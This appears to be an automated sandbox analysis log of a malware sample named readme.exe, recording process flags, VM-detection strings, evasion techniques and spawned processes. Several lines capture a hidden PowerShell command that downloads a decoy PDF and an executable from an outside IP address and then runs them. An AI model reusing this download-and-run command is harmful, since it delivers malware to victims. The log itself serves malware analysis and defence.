                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeAPI/Special instruction interceptor: Address: 7FFB2CECD044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 50BB83A
                      Source: readme.exe, 00000013.00000002.1650056640.0000000000C59000.00000040.00001000.00020000.00000000.sdmp, readme.exe, 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000003.1619124085.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1625143937.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                      Source: readme.exeBinary or memory string: CFF EXPLORER.EXE
                      Source: readme.exe, 00000013.00000002.1650056640.0000000000C59000.00000040.00001000.00020000.00000000.sdmp, readme.exe, 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000003.1619124085.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1625143937.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5746Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4054Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeDropped PE file which has not been started: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeAPI coverage: 0.4 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6136Thread sleep count: 5746 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6136Thread sleep count: 4054 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 968Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7696Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93B061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93B061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93B061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93B061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D939B14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D939B14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93B061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93B061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                      Source: fontdrvhost.exe, 00000018.00000003.1631831483.00000000050D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93B061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                      Source: svchost.exe, 0000000C.00000002.2511189729.000001F2B502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2513813751.000001F2BA858000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000002.1731109885.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: msedge.exe, 0000000B.00000003.1355365035.000062F4002C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93B061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                      Source: fontdrvhost.exe, 00000018.00000003.1631831483.00000000050D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93B061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93B061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D939B14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93B061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                      Source: fontdrvhost.exe, 00000018.00000002.1731109885.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWWin32_ProcessorIntel64 Family 6 Model 143 Stepping 8Win32_ProcessorIntel64 Family 6 Model 143 Stepping 8CPU0GenuineIntelIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzF5DE596D1ACPUCPU 0OKWin32_ComputerSystemuser-PC
                      Source: powershell.exe, 00000003.00000002.1499261908.000001D951A00000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.1367826072.000002584C841000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007A9098 VirtualAlloc,LdrInitializeThunk,VirtualFree,23_3_007A9098
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_004D7960 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004D7960
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007A9277 mov eax, dword ptr fs:[00000030h]23_3_007A9277
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 24_3_00790283 mov eax, dword ptr fs:[00000030h]24_3_00790283
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_0052B440 GetProcessHeap,HeapAlloc,19_2_0052B440
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess created: C:\Users\user\AppData\Local\Temp\readme.exe "C:\Users\user~1\AppData\Local\Temp\readme.exe"

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeMemory written: C:\Users\user\AppData\Local\Temp\readme.exe base: 770000 value starts with: 4D5A
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe""Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user~1\AppData\Local\Temp\readme.pdf Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\readme.exe "C:\Users\user~1\AppData\Local\Temp\readme.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -outfile "$env:temp\readme.pdf" ; start-process 'msedge.exe' -argumentlist \"--kiosk $env:temp\readme.pdf\" ; iwr -uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -outfile "$env:temp\readme.exe" ; start "$env:temp\readme.exe""
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -outfile "$env:temp\readme.pdf" ; start-process 'msedge.exe' -argumentlist \"--kiosk $env:temp\readme.pdf\" ; iwr -uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -outfile "$env:temp\readme.exe" ; start "$env:temp\readme.exe""Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_0079CDD5 cpuid 23_3_0079CDD5
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: GetCurrentThreadId,GetKeyboardLayout,GetLocaleInfoA,19_2_004C9670
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: GetCurrentThreadId,GetKeyboardLayout,GetLocaleInfoA,23_2_004C9670
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
